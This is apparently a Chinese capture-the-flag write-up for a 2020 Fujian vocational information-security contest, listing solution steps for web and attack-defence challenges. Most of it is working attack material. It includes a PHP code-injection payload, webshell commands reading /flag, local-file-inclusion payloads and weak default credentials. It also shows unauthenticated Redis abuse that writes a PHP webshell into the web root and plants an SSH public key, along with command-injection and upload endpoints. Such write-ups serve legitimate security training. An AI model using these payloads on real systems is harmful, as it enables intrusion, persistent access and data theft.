2020福建省职业院校技能大赛信息安全管理与评估WP
第二阶段
任务一
第一题: ?dcn=);show_source("flag.php");//
第二题:输入密码查看flag 密码是:13546
第三题:修改前端输入框大小
第四题:burp抓包--res模块重放
第五题:wireshark 第242包追中http流 读取flag到burp解密
任务二
页面有的东西 backup xiuno.com 还有一个登陆框
- url地址后加上.backup.zip 下载备份文件 共有12个目录
- html/route/404.php 一句话木马
- html/route/404.php post写get=phpinfo(); 查看php版本为5.4.45
- html/route/404.php post写get=system(tree); 回显flag
- 访问phpmyadmin,首页有密码提示(网站、phpmyadmin源码)登陆后在用户名密码框得flag
- html/route/404.php 一句话木马
任务三
靶机开放22,8091端口 利用文件包含
-
http://x.x.x.x:8091/lif.php?file=php://filter/convert.base64-encode/resource=lfi.php 解密得flag
-
根据题目着phpinfo信息,查看PHP_SHA256值,爆破phpinfo文件得flag(在PHP_SHA256)
-
下载python文件,填入send flag
- 填入 ` flag
-
运行python文件
- http://x.x.x.x:8091/lif.php?file=/tmp/g&1=system('find . -type f -exec cat /root/flag.txt {} ;');
第三阶段:AWD
弱密码
- root dcndcndcn
- dcn dcn
- mysql数据库 root Dcnflag.123
33137端口 ssh任意密码登陆
redis 3.2.11版本
- 网站写码连接
- ./redis-cli -h x.x.x.x
- 进入后用config set dir /var/www/html
- config set dbfilename a.php 木马文件名
- set a.php ""
- save
- 直接浏览器访问http://x.x.x.x/a.php?pass=system("cat /flag");
- 写入ssh公钥实现ssh登陆
- 先在本地kali生成 ssh-keygen -t rsa cd /root/.ssh/
- 将公钥写入key.txt (echo -e "\n";cat id_rsa.pub;echo -e "\n")>key.txt
- 然后把key.txt吸入redis缓存 cat /root/.ssh/key.txt |./redis-cli -h x.x.x.x -x set pub
web
- /shell.php pass密码 get请求
- http://x.x.x.x/shell.php?pass=system('cat /flag');
- /.shell.php pass密码 get 请求
- http://x.x.x.x/.shell.php?pass=system('cat /flag');
- /images/m.php cmd密码 post请求
/admin/include.php?file get 文件包含 显示可能在源代码中
/admin/magic_box/command.php?IP requests 命令执行
/admin/magic_box/low.php?IP 命令执行 &&连接 | & 连接
/admin/fileupload.php 文件上传php文件 上传后文件在/images/